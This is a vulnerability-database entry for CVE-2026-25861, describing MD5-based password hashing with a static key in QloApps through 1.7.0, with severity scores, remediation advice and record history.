Description
QloApps through 1.7.0, fixed in commit 64e9722, contains a weak cryptographic algorithm vulnerability that allows attackers to compromise user credentials by exploiting the use of MD5 for password hashing in the Tools::encrypt() function within classes/Tools.php, which concatenates a static cookie key with the supplied password. Attackers can perform offline brute-force attacks against the MD5 hashes, with the risk compounded by auto-generated 8-character passwords assigned during guest-to-customer account conversion in classes/Customer.php, making credential recovery trivial.
Published: 2026-06-02
Score: 8.2 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability resides in the Tools::encrypt() function in classes/Tools.php of QloApps versions up to 1.7.0. It uses MD5 to hash passwords concatenated with a static cookie key, making the resulting hash susceptible to offline brute‑force attacks. Because guest-to‑customer account conversion assigns an automatically generated 8‑character password, recovering credentials becomes trivial for an attacker. The weakness is classified as CWE‑916, and the compromise can lead to unauthorized account access.

Affected Systems

This weakness affects QloApps 1.7.0. No other product versions were explicitly identified as vulnerable in the provided data.

Risk and Exploitability

The CVSS score of 8.2 marks the issue as high severity. The EPSS score is not available, and the vulnerability is not listed in CISA’s KEV catalog. Attackers can obtain the MD5 hash from the database and perform offline brute‑force attacks without interacting with the live system. Because the hash uses a static cookie key and the password is short when auto‑generated, the required effort is minimal, making credential recovery and potential takeover likely.

Generated by OpenCVE AI on June 3, 2026 at 03:55 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update QloApps to the latest version or apply the patch commit 64e9722e7e6a8fda77dd53964d988fb6b5c3d174.
  • Enforce strong password policies, requiring longer, more complex passwords for all accounts.
  • Disable or replace the auto‑generation of 8‑character passwords during guest‑to‑customer account conversion.

Generated by OpenCVE AI on June 3, 2026 at 03:55 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 03 Jun 2026 16:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 03 Jun 2026 12:45:00 +0000

Type Values Removed Values Added
First Time appeared Qloapps
Qloapps qloapps
Vendors & Products Qloapps
Qloapps qloapps

Wed, 03 Jun 2026 02:30:00 +0000

Type Values Removed Values Added
Description QloApps through 1.7.0, fixed in commit 64e9722, contains a weak cryptographic algorithm vulnerability that allows attackers to compromise user credentials by exploiting the use of MD5 for password hashing in the Tools::encrypt() function within classes/Tools.php, which concatenates a static cookie key with the supplied password. Attackers can perform offline brute-force attacks against the MD5 hashes, with the risk compounded by auto-generated 8-character passwords assigned during guest-to-customer account conversion in classes/Customer.php, making credential recovery trivial.
Title QloApps 1.7.0 Weak Password Hashing via MD5 in Tools.php
Weaknesses CWE-916
References
Metrics cvssV3_1

{'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}

cvssV4_0

{'score': 8.2, 'vector': 'CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Qloapps Qloapps
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-06-03T14:12:34.812Z

Reserved: 2026-02-06T19:12:03.463Z

Link: CVE-2026-25861

cve-icon Vulnrichment

Updated: 2026-06-03T14:12:14.377Z

cve-icon NVD

Status : Received

Published: 2026-06-02T23:16:35.423

Modified: 2026-06-02T23:16:35.423

Link: CVE-2026-25861

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-03T10:54:27Z

Weaknesses